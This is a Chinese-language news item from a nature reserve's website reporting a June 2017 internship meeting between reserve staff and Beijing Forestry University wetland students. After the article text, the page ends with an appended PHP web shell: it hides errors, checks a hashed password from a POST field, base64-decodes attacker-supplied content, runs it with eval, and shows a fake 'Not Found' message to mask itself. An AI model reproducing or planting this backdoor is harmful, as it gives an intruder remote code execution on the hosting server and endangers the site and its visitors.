最新要闻

首页 > 最新要闻 >

    湿地组师生到江苏大丰麋鹿保护区开展实习

               2017年6月27日上午,北京林业大学自然保护区学院湿地组共20名师生来到麋鹿保护区开展实习交流座谈会。

    宣传教育处侯立冰,安全保卫处刘彬,景区旅游公司总经理许国新,研究所所长解生彬、副所长贾媛媛参加本次座谈。


        在此次座谈会上,我局工作人员分别对各处室日常工作进行了简单的介绍,便于同学们初步了解我保护区的管理概况与实务。刘处长详细介绍了安全保卫处对同学们的培养目标,并对日常活动如观鸟、鸟类巢址调查等进行了讲解。

    景区旅游公司许总经理对同学们提出了创新与实践结合的要求,并向同学们提供了导游、树牌设计与拉丁名纠错等实习岗位;研究所解所长为对麋鹿生理研究与数据分析感兴趣的同学们提供了机会。

    贾副所长则对在林木资源调查方面见长的同学提出制作林木资源分布图的期望。最后,侯主任向对保护区宣传教育有创新想法的同学们进行了工作介绍。


        在侯主任的总结后,自然保护区学院的同学们各自进行了自我介绍,并表明了自己的实习意向,选择了为期12天的实习工作岗位。

    同学们畅所欲言,希望这次实习能让同学们了解保护区的日常工作将学过的专业知识运用到实践当中去。

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>